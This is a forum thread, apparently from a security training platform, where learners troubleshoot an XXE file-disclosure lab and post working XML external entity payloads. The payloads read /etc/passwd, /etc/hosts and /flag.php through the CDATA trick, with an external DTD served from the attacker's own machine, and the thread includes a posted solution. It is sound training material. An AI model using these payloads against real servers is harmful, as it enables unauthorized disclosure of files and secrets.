Have a Problem in XXE Advanced File Disclosure

Hello fam,
I am having a problem with XXE Advanced File Disclosure!

The Lab Question: Use either method from this section to read the flag at ‘/flag.php’. (You may use the CDATA method at ‘/index.php’, or the error-based method at ‘/error’).

My Approach: So I tried the CDATA method as follows.
I first made an xxe.dtd file with the contents <!ENTITY joined "%begin;%file;%end;"> on my host, and then started my web server.

I go to the target IP's website and start intercepting with Burp. As expected, the request goes through '/submitDetails.php' with the POST method. So I tried to alter the XML data to perform an XXE attack.

Attempt 1
I included the following data:

<!DOCTYPE email [

  <!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->

  <!ENTITY % file SYSTEM "file:///etc/hosts"> <!-- reference external file -->

  <!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->

  <!ENTITY % xxe SYSTEM "http://10.10.14.204:8000/xxe.dtd"> <!-- reference our external DTD -->

  %xxe;
]>
.
.
.
<email>&joined;</email>

which works as expected.

Sorry, I had to delete the screenshot, as they don't permit it for a new user.

Attempt 2
So I tried the core feature of CDATA, to get the PHP source code of submitDetails.php, with the following payload.

<!DOCTYPE email [

  <!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->

  <!ENTITY % file SYSTEM "file:////var/www/html/submitDetails.php"> <!-- reference external file -->

  <!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->

  <!ENTITY % xxe SYSTEM "http://10.10.14.204:8000/xxe.dtd"> <!-- reference our external DTD -->

  %xxe;
]>
.
.
.
<email>&joined;</email>

But this doesn't output anything, as we expected.

Sorry, I had to delete the screenshot, as they don't permit it for a new user.

Attempt 3
So I tried to check another one, this time another system file, /etc/passwd. Surprisingly, this doesn't work either (unlike /etc/hosts, which worked).

Attempt 4
OK, I thought maybe they limit the file permissions or the output size, so I tried a basic XXE like the following.

<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>

.
.
.

<email>&example;</email>

But guess what, this works.

Sorry, I had to delete the screenshot, as they don't permit it for a new user.

Attempt 5
I have tried the things that I know, but none of them worked.
Bonus: So I tried to see what /flag.php from the question looks like, but it returns a 404 error, not a 302 or 500.
So I came here to ask for help. Maybe there is some glitch in the lab setup, or I am missing something important?

Thanks a lot. Please help me solve this puzzle.

Screenshot for Attempt 1:

Screenshot for Attempt 2

Screenshot for Attempt 4

[SOLVED]
I researched CDATA all the way and tried to alter the method a little. Now all my CDATA tags are on my server. The solution is as follows!
xxe.dtd

<!ENTITY % file SYSTEM "file:///flag.php">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">

XML Payload

<!DOCTYPE email [
  <!ENTITY % dtd SYSTEM
  "http://10.10.16.10:8000/xxe.dtd">
  %dtd;
  %all;
]>
.
.
.
<email>
&fileContents;
</email>

Thank you. Today I found out that researching and reading the documentation is also good practice when something doesn't work out.

6 Likes

Thanks, this is what I was missing!

Hello all,

I'm stuck at this point. I have been doing lots of things, but it doesn't work!!! I have been going around in circles for one week, seriously, wtf, I am losing my hair over this question... Could you help me, because just finding the file flag.php seems impossible... Or maybe not, but how do I do it?
Thanks

Hi guys,

Finally it works, but I think there are lots of problems with the VM... Because everything I did today I was already doing yesterday. So cool: it works!!! And I learned lots of things.
Thanks

Can someone please help me with this? It doesn't work, I tried everything!!!

It's indeed tricky!

It was just repeating the module.
I think people are confused because /etc/passwd, /index.php etc. are not being output.
Just run file:///etc/hosts, and once you can confirm it, run file:///flag.php.

<!DOCTYPE email [
  <!ENTITY % begin "<![CDATA[">
  <!ENTITY % file SYSTEM "file:///flag.php">
  <!ENTITY % end "]]>">
  <!ENTITY % xxe SYSTEM "http://10.10.x.x:8000/mal.dtd">
  %xxe;
]>
...
<email>&joined;</email>

mal.dtd:
<!ENTITY joined "%begin;%file;%end;">

I struggled a lot with this task, and I want to share what I found.

  • <!ENTITY % dtd SYSTEM "http://10.10.x.x:8000/xxe.dtd"> This declaration is evaluated on the target/pwn machine's web server side. If you write "localhost:8000" or any incorrect IP, it will be resolved on the web server side, and of course the target web server doesn't have anything on port 8000. Make sure to provide the correct IP address: the tunnel IP between your PC and the pwn machine which you established with OpenVPN. You can check the IP with the "ip add" or "ifconfig" commands.

  • Even if you provided the correct IP, make sure that your firewall does not block incoming requests from the web server. In my case, it was UFW (Uncomplicated Firewall). Disable it briefly, or allow incoming requests from the server, with "sudo ufw disable" or "sudo ufw allow from server_ip_address". Please refer to the official documentation of your firewall; improper configuration is a vulnerability.